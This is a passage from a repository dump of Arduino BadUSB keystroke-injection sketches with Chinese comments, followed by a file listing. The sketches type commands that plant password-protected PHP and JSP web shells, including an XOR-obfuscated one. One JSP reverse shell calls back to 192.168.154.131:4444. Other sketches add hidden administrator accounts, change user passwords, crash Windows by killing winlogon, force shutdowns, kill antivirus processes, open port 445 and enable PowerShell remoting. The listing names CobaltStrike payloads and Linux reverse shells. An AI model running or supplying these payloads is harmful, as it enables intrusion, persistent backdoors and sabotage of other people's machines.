Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/JspSentenceTrojanWritten (JSP_websiteServerUse).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println('echo ^<%@page import="java.lang.*"%^> >> hacked.jsp'); //向hacked.jsp写内容,这是一种jsp常见的一句话跳板木马,http://localhost/1.jsp?f=1.txt&t=hacker ,然后:http://localhost/1.txt 就出来了 内容为hacker,便于挂jsp大马
delay(200);
Keyboard.println("echo ^<% >> hacked.jsp");
Keyboard.println('echo if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); >> hacked.jsp');
Keyboard.println("echo %^> >> hacked.jsp");
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入jsp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println('echo ^<%@page import="java.lang.*"%^> >> hacked.jsp'); //向hacked.jsp写内容
delay(200);
Keyboard.println('echo ^<%@page import="java.util.*"%^> >> hacked.jsp');
delay(200);
Keyboard.println('echo ^<%@page import="java.io.*"%^> >> hacked.jsp');
delay(200);
Keyboard.println('echo ^<%@page import="java.net.*"%^> >> hacked.jsp');
delay(200);
Keyboard.println("echo ^<% >> hacked.jsp");
delay(200);
Keyboard.println("echo class StreamConnector extends Thread >> hacked.jsp");
delay(200);
Keyboard.println("echo { >> hacked.jsp");
delay(200);
Keyboard.println("echo InputStream ep; >> hacked.jsp");
delay(200);
Keyboard.println("echo OutputStream wk; >> hacked.jsp");
delay(200);
Keyboard.println("echo StreamConnector( InputStream ep, OutputStream wk ) >> hacked.jsp");
delay(200);
Keyboard.println("echo { >> hacked.jsp");
delay(200);
Keyboard.println("echo this.ep = ep; >> hacked.jsp");
delay(200);
Keyboard.println("echo this.wk = wk; >> hacked.jsp");
delay(200);
Keyboard.println("echo } >> hacked.jsp");
delay(200);
Keyboard.println("echo public void run() >> hacked.jsp");
delay(200);
Keyboard.println("echo { >> hacked.jsp");
delay(200);
Keyboard.println("echo BufferedReader lv = null; >> hacked.jsp");
delay(200);
Keyboard.println("echo BufferedWriter gih = null; >> hacked.jsp");
delay(200);
Keyboard.println("echo try >> hacked.jsp");
delay(200);
Keyboard.println("echo { >> hacked.jsp");
delay(200);
Keyboard.println("echo lv = new BufferedReader( new InputStreamReader( this.ep ) ); >> hacked.jsp");
delay(200);
Keyboard.println("echo gih = new BufferedWriter( new OutputStreamWriter( this.wk ) ); >> hacked.jsp");
delay(200);
Keyboard.println("echo char buffer[] = new char[8192]; >> hacked.jsp");
delay(200);
Keyboard.println("echo int length; >> hacked.jsp");
delay(200);
Keyboard.println("echo while( ( length = lv.read( buffer, 0, buffer.length ) ) > 0 ) >> hacked.jsp");
delay(200);
Keyboard.println("echo { >> hacked.jsp");
delay(200);
Keyboard.println("echo gih.write( buffer, 0, length ); >> hacked.jsp");
delay(200);
Keyboard.println("echo gih.flush(); >> hacked.jsp");
delay(200);
Keyboard.println("echo } >> hacked.jsp");
delay(200);
Keyboard.println("echo } catch( Exception e ){} >> hacked.jsp");
delay(200);
Keyboard.println("echo try >> hacked.jsp");
delay(200);
Keyboard.println("echo { >> hacked.jsp");
delay(200);
Keyboard.println("echo if( lv != null ) >> hacked.jsp");
delay(200);
Keyboard.println("echo lv.close(); >> hacked.jsp");
delay(200);
Keyboard.println("echo if( gih != null ) >> hacked.jsp");
delay(200);
Keyboard.println("echo gih.close(); >> hacked.jsp");
delay(200);
Keyboard.println("echo } catch( Exception e ){} >> hacked.jsp");
delay(200);
Keyboard.println("echo } >> hacked.jsp");
delay(200);
Keyboard.println("echo } >> hacked.jsp");
delay(200);
Keyboard.println("echo try >> hacked.jsp");
delay(200);
Keyboard.println("echo { >> hacked.jsp");
delay(200);
Keyboard.println("echo String ShellPath; >> hacked.jsp");
delay(200);
Keyboard.println('echo if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) { >> hacked.jsp');
delay(200);
Keyboard.println('echo ShellPath = new String("/bin/sh"); >> hacked.jsp');
delay(200);
Keyboard.println("echo } else { >> hacked.jsp");
delay(200);
Keyboard.println('echo ShellPath = new String("cmd.exe"); >> hacked.jsp');
delay(200);
Keyboard.println("echo } >> hacked.jsp");
delay(200);
Keyboard.println('echo Socket socket = new Socket( "192.168.154.131", 4444 ); >> hacked.jsp'); //改为自己主机的IP地址和对应端口号
delay(200);
Keyboard.println("echo Process process = Runtime.getRuntime().exec( ShellPath ); >> hacked.jsp");
delay(200);
Keyboard.println("echo ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); >> hacked.jsp");
delay(200);
Keyboard.println("echo ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); >> hacked.jsp");
delay(200);
Keyboard.println("echo } catch( Exception e ) {} >> hacked.jsp");
delay(200);
Keyboard.println("echo %^> >> hacked.jsp");
delay(200);
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入jsp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("echo ^<?php >> hacked.php"); //向hacked.php写内容,类绕过,密码wwy
delay(200);
Keyboard.println("echo class shawaf >> hacked.php");
delay(200);
Keyboard.println("echo { >> hacked.php");
delay(200);
Keyboard.println("echo public $a = ''; >> hacked.php");
delay(200);
Keyboard.println("echo function __destruct(){ >> hacked.php");
delay(200);
Keyboard.println('echo assert("$this->a"); >> hacked.php');
delay(200);
Keyboard.println("echo } >> hacked.php");
delay(200);
Keyboard.println("echo } >> hacked.php");
delay(200);
Keyboard.println("echo $b = new shawaf; >> hacked.php");
delay(200);
Keyboard.println('echo $b->a = $_POST["wwy"]; >> hacked.php');
delay(200);
Keyboard.println("echo ?^> >> hacked.php");
delay(200);
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("echo ^<?php >> hacked.php"); //向hacked.php写内容,密码_
delay(200);
Keyboard.println("echo $_=(''^'`').(''^'`').(''^'`'); >> hacked.php"); //ass
delay(200);
Keyboard.println("echo $__=(''^'`').(''^'`').(''^'`'); >> hacked.php"); //ert
delay(200);
Keyboard.println("echo $_ = $_.$__; >> hacked.php"); //assert
delay(200);
Keyboard.println("echo $__='_'.('\''^'`').('%'^'`').('4'^'`'); >> hacked.php"); //_GET
delay(200);
Keyboard.println("echo //$__='_'.(' >> hacked.php");
delay(200);
Keyboard.println("echo //'^']').('/'^'`').(''^']').(' '^']'); >> hacked.php"); //_POST
delay(200);
Keyboard.println("echo $___=$$__; >> hacked.php");
delay(200);
Keyboard.println("echo @$_($___[_]); >> hacked.php"); //@assert($_GET[_])
delay(200);
Keyboard.println("echo ?^> >> hacked.php");
delay(200);
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: Site_AWord_IntrusionCode/PHP_TrojanWrite(usedByPHP_websiteServer).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("echo ^<?php @eval($_POST['wwy']); ?^> >> hacked.php"); //向hacked.php写内容,密码wwy
delay(200);
Keyboard.println("echo @echo off >> hacked.bat");
delay(200);
Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx
delay(200);
Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat");
delay(200);
Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if exist %%a:\ ( >> hacked.bat");
delay(200);
Keyboard.println("echo pushd %%a:\ >> hacked.bat");
delay(200);
Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat");
delay(200);
Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat");
delay(200);
Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo popd >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("echo ) >> hacked.bat");
delay(200);
Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接
delay(9000);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: SpecificFunctionCode/AddUserCode(Tools).ino
================================================
#include <Keyboard.h>
void setup() {
// 这里执行一次
Keyboard.begin();//开始键盘通讯
delay(2000);//初始化时间
Keyboard.press(KEY_LEFT_GUI); //点击win键
delay(50); //延迟执行时间
Keyboard.press('r'); //点击r键
delay(50);
Keyboard.release(KEY_LEFT_GUI); //释放win键
Keyboard.release('r'); //释放r键
delay(50);
Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //打开cmd并将串口最小化
delay(100);
Keyboard.press(KEY_RETURN); //回车
Keyboard.release(KEY_RETURN); //释放回车
delay(50);
Keyboard.println("net user test 123456 /add&net localgroup Administrators test /add"); //添加test用户
delay(1000);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.println("exit");
delay(50);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.end();//结束键盘通讯
}
void loop() {
// 这里循环执行
}
================================================
FILE: SpecificFunctionCode/Alt-f4_Loop.ino
================================================
void setup() {//初始化
Keyboard.begin();
}
void loop()//循环
{
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
}
================================================
FILE: SpecificFunctionCode/ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("CMD.EXE /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&NET USER %USERNAME% HACKED");//修改密码HACKED
delay(200);
Keyboard.println("color a");//更改命令行颜色(绿色)
delay(200);
Keyboard.println("echo ........................................................ >> hacked.txt");//向hacked.txt写内容
delay(200);
Keyboard.println("echo ## ## ### ###### ## ## ######## ######## >> hacked.txt");//向hacked.txt写内容
delay(200);
Keyboard.println("color 0");//更改命令行颜色(绿色)
delay(200);
Keyboard.println("echo ## ## ## ## ## ## ## ## ## ## ## >> hacked.txt");//向hacked.txt写内容
delay(200);
Keyboard.println("color 1");//更改命令行颜色(绿色)
delay(200);
Keyboard.println("echo ## ## ## ## ## ## ## ## ## ## >> hacked.txt");//向hacked.txt写内容
delay(200);
Keyboard.println("color 2");//更改命令行颜色(绿色)
delay(200);
Keyboard.println("echo ######### ## ## ## ##### ###### ## ## >> hacked.txt");//向hacked.txt写内容
delay(200);
Keyboard.println("color 3");//更改命令行颜色(绿色)
delay(200);
Keyboard.println("echo ## ## ######### ## ## ## ## ## ## >> hacked.txt");//向hacked.txt写内容
delay(200);
Keyboard.println("color 4");//更改命令行颜色(绿色)
delay(200);
Keyboard.println("echo ## ## ## ## ## ## ## ## ## ## ## >> hacked.txt");//向hacked.txt写内容
delay(200);
Keyboard.println("color 5");//更改命令行颜色(绿色)
delay(200);
Keyboard.println("echo ## ## ## ## ###### ## ## ######## ######## >> hacked.txt");//向hacked.txt写内容
delay(200);
Keyboard.println("color 6");//更改命令行颜色(绿色)
delay(200);
Keyboard.println("echo ........................................................ >> hacked.txt");//向hacked.txt写内容
delay(200);
Keyboard.println("color c");//更改命令行颜色(红色)
delay(200);
Keyboard.println("cls");//更改命令行颜色(红色)
delay(200);
Keyboard.println("type hacked.txt");//将hacked.txt文件内容打印在cmd
delay(200);
Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL");//蓝屏XP、7
delay(200);
Keyboard.println("taskkill /f /im explorer.exe");//删除桌面进程(all)
delay(200);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: SpecificFunctionCode/EnablePSL_RemoteConnection(Tools).ino
================================================
#define BOARDTYPE
#ifdef TEENSY2
#include<usb_private.h>
#endif
# define PAYLOAD_USER_ADD "net user INPUT0 INPUT1 /add"
# define PAYLOAD_GROUP_ADD "net localgroup Administrators INPUT0 /add"
void setup(){
delay(3000);
wait_for_drivers(2000);
minimise_windows();
delay(500);
while(!cmd_admin(3,500))
{
reset_windows_desktop(2000);
}
add_user();
Keyboard.println("powershell.exe Enable-PSRemoting -SkipNetworkProfileCheck -Force;Set-NetFirewallRule –Name \"WINRM-HTTP-In-TCP-PUBLIC\" –RemoteAddress Any");
delay(2000);
Keyboard.println("exit");
}
void loop(){
}
void add_user(){
delay(2000);
Keyboard.println(PAYLOAD_USER_ADD);
delay(2000);
Keyboard.println(PAYLOAD_GROUP_ADD);
delay(1000);
}
DEFS
================================================
FILE: SpecificFunctionCode/ForceShutDownCommand(Tool).ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(3000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("SHUTDOWN -S -F -T 0");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: SpecificFunctionCode/ForcedDeletionOf360Processes(Tools).ino
================================================
void setup() {
Mouse.begin();//鼠标事件开始
Keyboard.begin();
delay(7000);
for(int i=0;i<20;i++){
Mouse.move(-127,-127);//鼠标移动(x,y)
}
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("\"C:\\Program Files (x86)\\360\\360Safe\\safemon\\360Tray.exe\" /disablesp 1");
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(1000);
Keyboard.println("taskkill /F /IM explorer.exe");
delay(3000);
for(int b=0;b<30;b++){
Mouse.move(20,0);
for(int a=0;a<100;a++){
Mouse.move(0,8);
Mouse.click();
}
for(int c=0;c<20;c++){
Mouse.move(0,-127);//鼠标移动(x,y)
}
}
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_DELETE);
Keyboard.release(KEY_LEFT_CTRL);
Keyboard.release(KEY_DELETE);
delay(2000);
Keyboard.press('t');
Keyboard.release('t');
delay(1000);
Keyboard.press('f');
Keyboard.press('n');
Keyboard.release('f');
Keyboard.release('n');
Keyboard.release(KEY_LEFT_ALT);
delay(1000);
Keyboard.print("explorer");
Keyboard.press(KEY_TAB);
Keyboard.release(KEY_TAB);
delay(500);
Keyboard.println(" ");
delay(3000);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(1000);
Keyboard.println("cmd /c taskkill /F /IM taskmgr.exe&taskkill /F /IM 360Tray.exe&taskkill /F /IM ZhuDongFangYu.exe");
Mouse.end();//鼠标事件结束
Keyboard.end();
}
void loop() {
// put your main code here, to run repeatedly:
}
================================================
FILE: SpecificFunctionCode/Hide_CMD_Window(Display).ino
================================================
//隐藏CMD窗口
void setup() {
Keyboard.begin();
delay(3000);
Keyboard.press(KEY_LEFT_GUI);
delay(200);
Keyboard.print('r');
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(1000);
//=========================Run==========================
Keyboard.println("CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6");
delay(1000);
Keyboard.press(KEY_LEFT_ALT);
delay(200);
Keyboard.press(' ');
delay(200);
Keyboard.release(KEY_LEFT_ALT);
Keyboard.release(' ');
delay(200);
Keyboard.print("m");
Keyboard.press(KEY_LEFT_ARROW);
delay(3000);
Keyboard.release(KEY_LEFT_ARROW);
Keyboard.println();
//======================================================
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();
}
void loop() {
}
================================================
FILE: SpecificFunctionCode/MouseKeepsMoving(Tools).ino
================================================
void setup() {
Mouse.begin();
}
void loop() {
Mouse.move(10,0);
delay(800);
Mouse.move(-10,0);
delay(800);
}
================================================
FILE: SpecificFunctionCode/OpenPort445.ino
================================================
#include "DigiKeyboard.h"
#define KEY_ESC 41
#define KEY_BACKSPACE 42
#define KEY_TAB 43
#define KEY_PRT_SCR 70
#define KEY_DELETE 76
void setup()
{
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(KEY_M,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("netsh advfirewall firewall add rule name="));
DigiKeyboard.print(char(34));
DigiKeyboard.print(F("open445"));
DigiKeyboard.print(char(34));
DigiKeyboard.print(F(" dir=in protocol=tcp localport=445 action=allow"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop()
{
}
================================================
FILE: SpecificFunctionCode/OpenSpecified_webPage.ino
================================================
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(3000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(200);
Keyboard.println("HTTP://SHOP117137052.TAOBAO.COM");
Keyboard.println();
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: SpecificFunctionCode/ShiftBackdoor.ino
================================================
//Lemon_C Device Library
//shop117137052.taobao.com
void setup() {//初始化
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6"); //尽量隐藏命令行窗口
delay(1000);
Keyboard.press(KEY_LEFT_ALT);
delay(200);
Keyboard.print(" ");
delay(200);
Keyboard.release(KEY_LEFT_ALT);
delay(200);
Keyboard.print("m");
Keyboard.press(KEY_LEFT_ARROW);
delay(3000);
Keyboard.release(KEY_LEFT_ARROW);
delay(500);
Keyboard.println();
delay(500);
Keyboard.println("POWERSHELL.EXE -C START-PROCESS CMD -VERB RUNAS&&EXIT"); //psl启动dos命令
//NEED BYPASS UAC NOW,SET DELAY=3S.
Keyboard.press(KEY_LEFT_ALT);
delay(3000);
Keyboard.print('Y');
Keyboard.releaseAll();
delay(2000);
//HIDE THE WINDOW
Keyboard.println();
Keyboard.println("CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 l
gitextract_e7t_03bd/
├── AddUser_StartService/
│ ├── AddUser_Enable3389(tools).ino
│ └── AddUser_EnableFTP(tools).ino
├── BlueScreen/
│ ├── BlueScreen1(DOS).ino
│ ├── BlueScreen2(DOS).ino
│ ├── BlueScreen3(DOS).ino
│ ├── BlueScreen_xp_win7(DOS).ino
│ ├── DelayedBlueScreen (DOS).ino
│ ├── RegistryWriteBlueScreen (DOS).ino
│ └── RegistryWriteBlueScreenGeneralUse (DOS).ino
├── CobaltStrike_Trojanlinkage/
│ ├── Bitsadmin_TrojanExecution (LinkageWithCS).ino
│ ├── CobaltStrike_Payload/
│ │ ├── payload.c
│ │ ├── payload.cs
│ │ ├── payload.java
│ │ ├── payload.pl
│ │ ├── payload.ps1
│ │ ├── payload.py
│ │ ├── payload.rb
│ │ ├── payload.sct
│ │ ├── payload.txt
│ │ └── payload.vba
│ ├── PSL_TrojanExecution (LinkageWithCS).ino
│ ├── PY_TrojanExecution (LinkageWithCS).ino
│ ├── Pl_TrojanExecution (LinkageWithCS).ino
│ └── Regsvr32_TrojanExecution (LinkageWithCS).ino
├── CodePrincipleInterpretation/
│ ├── ArduinoKeyCodeBase.ino
│ ├── InstructionsOn_setup_loop_Methods.txt
│ └── MSF_TrojanMakingTutorial.txt
├── DNSHijack/
│ ├── DOS_CommandSetMultipleDNS(DNSHijack).ino
│ └── PSL_CommandSetMultipleDNS(DNSHijack).ino
├── LICENSE
├── Linux_Built-inReverseShell/
│ ├── LinuxReverseShell (CodeExecution).ino
│ ├── LinuxReverseShell(BashShell).ino
│ └── LinuxReverseShell(PerlShell).ino
